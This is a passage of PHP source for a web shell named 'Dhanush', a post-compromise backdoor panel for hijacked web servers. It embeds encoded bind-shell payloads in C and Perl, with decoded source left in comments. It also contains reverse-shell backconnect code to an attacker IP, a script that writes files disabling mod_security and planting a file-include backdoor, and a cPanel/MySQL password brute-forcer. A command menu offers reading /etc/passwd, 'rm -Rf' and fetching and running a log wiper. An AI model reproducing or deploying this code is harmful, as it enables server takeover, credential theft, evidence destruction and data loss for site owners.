7937$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
7938/*
7939$bind_port_c --> isinya
7940
7941
7942
7943#include <stdio.h>
7944#include <string.h>
7945#include <unistd.h>
7946#include <netdb.h>
7947#include <stdlib.h>
7948int main(int argc, char **argv) {
7949 int s,c,i;
7950 char p[30];
7951 struct sockaddr_in r;
7952 daemon(1,0);
7953 s = socket(AF_INET,SOCK_STREAM,0);
7954 if(!s) return -1;
7955 r.sin_family = AF_INET;
7956 r.sin_port = htons(atoi(argv[1]));
7957 r.sin_addr.s_addr = htonl(INADDR_ANY);
7958 bind(s, (struct sockaddr *)&r, 0x10);
7959 listen(s, 5);
7960 while(1) {
7961 c=accept(s,0,0);
7962 dup2(c,0);
7963 dup2(c,1);
7964 dup2(c,2);
7965 write(c,"Password:",9);
7966 read(c,p,sizeof(p));
7967 for(i=0;i<strlen(p);i++)
7968 if( (p[i] == '\n') || (p[i] == '\r') )
7969 p[i] = '\0';
7970 if (strcmp(argv[2],p) == 0)
7971 system("/bin/sh -i");
7972 close(c);
7973 }
7974}
7975*/
7976$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
7977/*
7978$bind_port_p ---> isinya
7979
7980#!/usr/bin/perl
7981$SHELL="/bin/sh -i";
7982if (@ARGV < 1) { exit(1); }
7983use Socket;
7984socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
7985setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
7986bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
7987listen(S,3) || die "Cant listen port\n";
7988while(1) {
7989 accept(CONN,S);
7990 if(!($pid=fork)) {
7991 die "Cannot fork" if (!defined $pid);
7992 open STDIN,"<&CONN";
7993 open STDOUT,">&CONN";
7994 open STDERR,">&CONN";
7995 exec $SHELL || die print CONN "Cant execute $SHELL\n";
7996 close CONN;
7997 exit 0;
7998 }
7999}
8000*/
8001
8002
8003
8004echo $shellstyle;
8005?>
8006<table style="width:100%;">
8007<tr align="right">
8008<td><a href="<?php echo $self;?>"><font size="6" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
8009</td><td align="right">
8010<form method="get">
8011<select id="style" class="sbox" onChange="change_style(this.value)">
8012<option selected="selected">--Style--</option>
8013<option value="dhanush">Dhanush</option>
8014<option value="404">404</option>
8015<option value="phizo">Phizo</option>
8016<option value="orange">Orange</option>
8017</select>
8018</form></td>
8019</tr></table>
8020<hr color="#1B1B1B">
8021
8022<table cellpadding="0" style="width:100%;">
8023 <tr>
8024 <td colspan="2" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
8025 <td style="width:7%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
8026 <td style="width:8%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
8027 </tr>
8028 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
8029 <td style="width:85%;" colspan="2">Uid : <font class="txt"><?php if(shell_exec("id")){echo shell_exec("id");}else{echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid();} ?></font></td>
8030 <?php $d0mains = @file("/etc/named.conf");
8031 $users=@file('/etc/passwd');
8032 if($d0mains)
8033 {
8034 $count;
8035 foreach($d0mains as $d0main)
8036 {
8037 if(@ereg("zone",$d0main))
8038 {
8039 preg_match_all('#zone "(.*)"#', $d0main, $domains);
8040 flush();
8041 if(strlen(trim($domains[1][0])) > 2)
8042 {
8043 flush();
8044 $count++;
8045 }
8046 }
8047 }
8048 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
8049 }
8050 else if($users)
8051 {
8052 $file = fopen("/etc/passwd", "r");
8053 while(!feof($file))
8054 {
8055 $s = fgets($file);
8056 $matches = array();
8057 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
8058 $matches = str_replace("home/","",$matches[1]);
8059 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
8060 continue;
8061 $count++;
8062 }
8063 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
8064 <?php if($os == "Linux") { ?><td style="width:8%;vertical-align:text-top;"><a href="<?php echo $self.'?downloadit'?>">Download It</a></td><?php } ?>
8065 </tr><?php } ?>
8066 <tr>
8067 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); ?> of <?php echo HumanReadableFilesize(diskSpace()); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
8068 <td style="width:20%;vertical-align:text-top;">Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
8069
8070 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
8071 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
8072 </tr>
8073
8074 <tr>
8075 <?php if($os == 'Windows'){ ?><td style="width:15%;vertical-align:text-top;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
8076 <td style="width:30%;vertical-align:text-top;">Current Directory : <span id="crdir"><font color="#009900">
8077 <?php
8078 $d = str_replace("\\",$directorysperator,$dir);
8079 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
8080 $d = str_replace("\\\\","\\",$d);
8081 $dispd = htmlspecialchars($d);
8082 $pd = $e = explode($directorysperator,substr($d,0,-1));
8083 $i = 0;
8084 foreach($pd as $b)
8085 {
8086 $t = '';
8087 $j = 0;
8088 foreach ($e as $r)
8089 {
8090 $t.= $r.$directorysperator;
8091 if ($j == $i) {break;}
8092 $j++;
8093 }
8094$href=addslashes($t);
8095
8096 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
8097 $i++;
8098 }
8099
8100 ?>
8101 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
8102 <td colspan="3" style="width:20%;max-width:200px;word-break:break-all;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
8103 </tr>
8104 </table>
8105
8106<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
8107 $m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
8108 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
8109 <tr>";
8110 $menu = '';
8111
8112 foreach($m1 as $k => $v)
8113 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
8114 echo $menu;
8115 echo "</tr>
8116</table>
8117<center>
8118<table style=\"border-color:#333333;\" border=2 width=70%; cellpadding=2>
8119 <tr align=center>";
8120 foreach($m2 as $k => $v)
8121 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
8122 echo $menu1;
8123 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
8124 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
8125 </tr>
8126</table></center>";?>
8127
8128<div id="showmaindata"></div>
8129<center><div id="showmydata"></div></center>
8130<?php
8131
8132if(isset($_GET["downloadit"]))
8133{
8134 $FolderToCompress = getcwd();
8135 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
8136
8137 $prd=explode("/","backup.tar");
8138 for($i=0;$i<sizeof($prd);$i++)
8139 {
8140 $nfd=$prd[$i];
8141 }
8142 @ob_clean();
8143 header("Content-type: application/octet-stream");
8144 header("Content-length: ".filesize($nfd));
8145 header("Content-disposition: attachment; filename=\"".$nfd."\";");
8146 readfile($nfd);
8147 exit;
8148}
8149//Turn Safe Mode Off
8150if(getDisabledFunctions() != "None" || safe() != "OFF")
8151{
8152 $file_pointer = fopen(".htaccess", "w+");
8153 fwrite($file_pointer, "<IfModule mod_security.c>
8154 SecFilterEngine Off
8155 SecFilterScanPOST Off
8156 </IfModule> \n\r");
8157
8158 $file_pointer = fopen("ini.php", "w+");
8159 fwrite($file_pointer, "<?
8160echo ini_get(\"safe_mode\");
8161echo ini_get(\"open_basedir\");
8162include(\$_GET[\"file\"]);
8163ini_restore(\"safe_mode\");
8164ini_restore(\"open_basedir\");
8165echo ini_get(\"safe_mode\");
8166echo ini_get(\"open_basedir\");
8167include(\$_GET[\"ss\"]);
8168?>");
8169
8170 $file_pointer = fopen("php.ini", "w+");
8171 fwrite($file_pointer, "safe_mode = Off");
8172
8173 fclose($file_pointer);
8174
8175 }
8176
8177if(isset($_POST['cpanelattack']))
8178{
8179 if(!empty($_POST['username']) && !empty($_POST['password']))
8180 {
8181 $userlist=explode("\n",$_POST['username']);
8182 $passlist=explode("\n",$_POST['password']);
8183
8184 $e = explode("\n",$_POST['username']);
8185 foreach($e as $value)
8186 {
8187 $k = explode(":",$value);
8188 $username .= $k['0']." ";
8189 }
8190
8191 $a1 = explode(" ",$username);
8192 $a2 = explode("\n",$_POST['password']);
8193 $id2 = count($a2);
8194 $ok = 0;
8195 foreach($a1 as $user)
8196
8197 {
8198 if($user !== '')
8199 {
8200 $user=trim($user);
8201 for($i=0;$i<=$id2;$i++)
8202 {
8203 $pass = trim($a2[$i]);
8204 if(@mysql_connect('localhost',$user,$pass))
8205 {
8206 echo "User is (<b>$user</b>) Password is (<b><font class='txt'>$pass</font></b>)<br />";
8207 $ok++;
8208 }
8209 }
8210 }
8211 }
8212 echo "<hr><b>You Found <font color=red>$ok</font></b>";
8213 }
8214 else
8215 $bdmessage = "<center>Enter Username & Password List<center>";
8216}
8217elseif(isset($_GET['style']))
8218{
8219 setcookie('style',$_GET['style']);
8220 header("location:$self");
8221}
8222else if(isset($_GET['info']))
8223{
8224 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
8225}
8226else if(isset($_POST['u']))
8227{
8228 $path = $_REQUEST['path'];
8229 if(is_dir($path))
8230 {
8231 $setuploadvalue = 0;
8232 $uploadedFilePath = $_FILES['uploadfile']['name'];
8233 $tempName = $_FILES['uploadfile']['tmp_name'];
8234 if($os == "Windows")
8235 $uploadPath = $path . $directorysperator . $uploadedFilePath;
8236 else if($os == "Linux")
8237 $uploadPath = $path . $directorysperator . $uploadedFilePath;
8238 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
8239 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
8240 else
8241 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
8242 }
8243 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
8244}
8245else if(isset($_POST['backdoor']))
8246{
8247 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
8248 { ?><script type="text/javascript">gethome('connect');</script><?php
8249 $passwd = $_POST['passwd'];
8250
8251 if($_POST['lang'] == 'c')
8252 {
8253 if(is_writable("."))
8254 {
8255 @$fh=fopen(getcwd()."/backp.c",'w');
8256 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
8257 @fclose($fh);
8258 execmd("chmod 0755 ".getcwd()."/backp.c");
8259 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
8260 execmd("chmod 0755 ".getcwd()."/backp");
8261 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
8262 $scan = exec_all("ps aux | grep backp".$_POST['port']);
8263 if(eregi("backp".$_POST['port'],$scan))
8264 $bdmessage = "Process found running, backdoor setup successfully.";
8265 else
8266 $bdmessage = "Process not found running, backdoor not setup successfully.";
8267 }
8268 else
8269 {
8270 @$fh=fopen("/tmp/backp.c","w");
8271 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
8272 @fclose($fh);
8273 execmd("chmod 0755 /tmp/backp.c");
8274 execmd("gcc -o /tmp/backp /tmp/backp.c");
8275 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
8276 $scan = exec_all("ps aux | grep backp".$_POST['port']);
8277 if(eregi("backp".$_POST['port'],$scan))
8278 $bdmessage = "Process found running, backdoor setup successfully.";
8279 else
8280 $bdmessage = "Process not found running, backdoor not setup successfully.";
8281 }
8282 }
8283 if($_POST['lang'] == 'perl')
8284 {
8285 if(is_writable("."))
8286 {
8287 @$fh=fopen(getcwd()."/bp.pl",'w');
8288 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
8289 @fclose($fh);
8290 execmd("chmod 0755 ".getcwd()."/bp.pl");
8291 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
8292
8293 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
8294 }
8295 else
8296 {
8297 @$fh=fopen("/tmp/bp.pl","w");
8298 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
8299 @fclose($fh);
8300 execmd("chmod 0755 ".getcwd()."/bp.pl");
8301 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
8302 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
8303 }
8304 }
8305 }
8306}
8307else if(isset($_POST['backconnect']))
8308{
8309 if($_POST['ip'] != "" && $_POST['port'] != "")
8310 { ?><script type="text/javascript">gethome('connect');</script><?php
8311 $host = $_POST['ip'];
8312 $port = $_POST['port'];
8313 if($_POST["lang"] == "perl")
8314 {
8315 if(is_writable("."))
8316 {
8317 @$fh=fopen(getcwd()."/bc.pl",'w');
8318 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
8319 @fclose($fh);
8320 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
8321 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
8322 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
8323 }
8324 else
8325 {
8326 @$fh=fopen("/tmp/bc.pl","w");
8327 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
8328 @fclose($fh);
8329 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
8330 execmd("perl /tmp/bc.pl $host $port &",$disable);
8331 if(!@unlink("/tmp/bc.pl"))
8332 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
8333 }
8334 }
8335 else if($_POST["lang"] == "python")
8336 {
8337 if(is_writable("."))
8338 {
8339 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
8340 if($w_file)
8341 {
8342 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
8343 @fclose($w_file);
8344 chmod(getcwd().'/bc.py', 0777);
8345 }
8346 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
8347 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
8348
8349 if(!@unlink(getcwd()."/bc.py"))
8350 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
8351 }
8352 else
8353 {
8354 $w_file=@fopen("/tmp/bc.py","w");
8355 if($w_file)
8356 {
8357 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
8358 @fclose($w_file);
8359 chmod('/tmp/bc.py', 0777);
8360 }
8361 execmd("python /tmp/bc.py $host $port &",$disable);
8362 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
8363 if(!@unlink("/tmp/bc.py"))
8364 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
8365 }
8366 }
8367 else if($_POST["lang"] == "php")
8368 {
8369 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
8370 $ip = $_POST['ip'];
8371 $port=$_POST['port'];
8372 $sockfd=fsockopen($ip , $port , $errno, $errstr );
8373 if($errno != 0)
8374 {
8375 $bdmessage = "<b>$errno</b> : $errstr";
8376 }
8377 else if (!$sockfd)
8378 {
8379 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
8380 }
8381 else
8382 {
8383 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
8384 $pwd = exec_all("pwd");
8385 $sysinfo = exec_all("uname -a");
8386 $id = exec_all("id");
8387 $len = 1337;
8388 fputs($sockfd ,$sysinfo . "\n" );
8389 fputs($sockfd ,$pwd . "\n" );
8390 fputs($sockfd ,$id ."\n\n" );
8391 fputs($sockfd ,$dateAndTime."\n\n" );
8392 while(!feof($sockfd))
8393 {
8394 $cmdPrompt ="(dhanush)[$]> ";
8395 fputs ($sockfd , $cmdPrompt );
8396 $command= fgets($sockfd, $len);
8397 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
8398 }
8399 fclose($sockfd);
8400 }
8401 }
8402 }
8403}
8404else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
8405{
8406 $temp = "";
8407 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
8408 {
8409 $uid = @posix_getpwuid($_GET['val1']);
8410 if ($uid)
8411 $temp .= join(':',$uid)."\n";
8412 }
8413 echo '<br/>';
8414 paramexe('Users', $temp);
8415}
8416else if(isset($_GET['download']))
8417{
8418 download();
8419}
8420else
8421{
8422 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
8423}
8424$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
8425?>
8426</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
8427<table class="btmtbl" style="width:100%;" border="1">
8428<tr>
8429<td class="btmtbl" align="center">
8430<form method="post" enctype="multipart/form-data">
8431Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
8432<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
8433<input type=submit value="Upload" name="u" value="u" class="but" ></form>
8434<span name="wrtble"><?php
8435
8436echo $is_writable; ?></span>
8437 <br>
8438</td>
8439<td class="btmtbl" align="center" style="height:105px;">Create File :
8440<form onSubmit="createdir('Create',createfile.value);return false;">
8441<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
8442<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
8443</form><span name="wrtble">
8444<?php echo $is_writable; ?></span>
8445</td>
8446</tr>
8447<tr>
8448<td class="btmtbl" align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
8449<input type="text" class="box" name="execute">
8450<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
8451 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
8452
8453<td class="btmtbl" align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
8454<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
8455<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
8456</form><span name="wrtble"><?php
8457echo $is_writable;
8458?></span></td></tr>
8459<tr>
8460<td class="btmtbl" align="center">Read File<form onSubmit="createdir('readfile',readfile.value);return false;">
8461<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readfile" id="readfile">
8462<input type="button" onClick="createdir('readfile',readfile.value)" value="Read" class="but">
8463</form></td>
8464<td class="btmtbl" align="center">Read Directory<form onSubmit="changedir('dir',readdir.value);return false;">
8465<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readdir" id="readdir">
8466<input type="button" onClick="changedir('dir',readdir.value)" value=" View " class="but">
8467</form></td></tr>
8468<tr><td class="btmtbl" style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
8469<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
8470<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
8471<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
8472<select name="functiontype" class="sbox">
8473<option value="wwget">wget</option>
8474<option value="wlynx">lynx</option>
8475<option value="wfread">fread</option>
8476<option value="wfetch">fetch</option>
8477<option value="wlinks">links</option>
8478<option value="wget">GET</option>
8479<option value="wcurl">curl</option>
8480</select>
8481</form><div id="showexp"></div>
8482</td>
8483<td class="btmtbl" align="center">
8484<form>
8485Some Commands<br>
8486<?php if($os != "Windows")
8487{ ?>
8488<SELECT NAME="mycmd" class="box">
8489 <OPTION VALUE="uname -a">Kernel version
8490 <OPTION VALUE="w">Logged in users
8491 <OPTION VALUE="lastlog">Last to connect
8492 <option value='cat /etc/hosts'>IP Addresses
8493 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
8494 <OPTION VALUE="logeraser">Log Eraser
8495 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
8496 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
8497 <OPTION VALUE="find / -type f -name 'config'">find config files
8498 <OPTION VALUE="find . -type f -name \"config\"">find config files in current dir
8499
8500 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
8501 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
8502 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
8503 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
8504 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
8505 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
8506 <OPTION VALUE="ps aux">Show running proccess
8507 <OPTION VALUE="uptime">Uptime check
8508 <OPTION VALUE="cat /proc/meminfo">Memory check
8509 <OPTION VALUE="netstat -an | grep -i listen">Open ports
8510 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
8511 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
8512 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
8513 <OPTION VALUE="./zap2">WIPELOGS PT3
8514 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
8515 </SELECT>
8516 <?php } else {?>
8517 <SELECT NAME="mycmd" class="box">
8518 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
8519 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
8520 <OPTION VALUE="systeminfo">System Informations
8521 <OPTION VALUE="net user">User accounts
8522 <OPTION VALUE="netstat -an">Open ports
8523 <OPTION VALUE="getmac">Get Mac Address
8524 <OPTION VALUE="net start">Show running services
8525 <OPTION VALUE="net view">Show computers
8526 <OPTION VALUE="arp -a">ARP Table
8527 <OPTION VALUE="tasklist">Show Process
8528 <OPTION VALUE="ipconfig/all">IP Configuration
8529
8530 </SELECT>
8531 <?php } ?>
8532 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
8533<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
8534</form>
8535</td>
8536</tr></table><br>
8537
8538</td>
8539</tr>
8540</table>
8541
8542<?php
8543
8544
8545//logout
8546
8547if(isset($_GET['logout']))
8548{
8549 setcookie("hacked",time() - 60*60);
8550 header("Location:$self");
8551 ob_end_flush();
8552}
8553?>
8554
8555
8556<hr color="#1B1B1B">
8557<div align="center">
8558<font size="6" face="Times New Roman, Times, serif">धनुष<br>
8559--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font size="6">जय हिन्द</font></a></div>
8560<?php
8561}
8562}
8563
8564if(isset($_POST['uname']) && isset($_POST['passwd']))
8565{
8566 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
8567 {
8568 setcookie("hacked", md5($pass));
8569 $selfenter = $_SERVER["PHP_SELF"];
8570 header("Location:$selfenter");
8571 }
8572}
8573
8574if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
8575{
8576 echo $shellstyle;
8577?>
8578 <center>
8579 <form method="POST">
8580 <div class="logindiv" style="width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px;">
8581 <table cellpadding="9" cellspacing="4">
8582 <tr>
8583 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
8584 </tr>
8585 <tr>
8586 <td align="right"><b>User Name : </b></td>
8587 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
8588 </tr>
8589 <tr>
8590 <td align="right"><b>Password : </b></td>
8591 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
8592 </tr>
8593 <tr>
8594 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
8595 </tr>
8596 <tr>
8597 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
8598 </tr>
8599 <tr>
8600 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
8601 </tr>
8602 </table>
8603 </div>
8604
8605 </form>
8606 </center>
8607<br>
8608
8609</body>
8610</html>
8611<?php
8612}
8613?>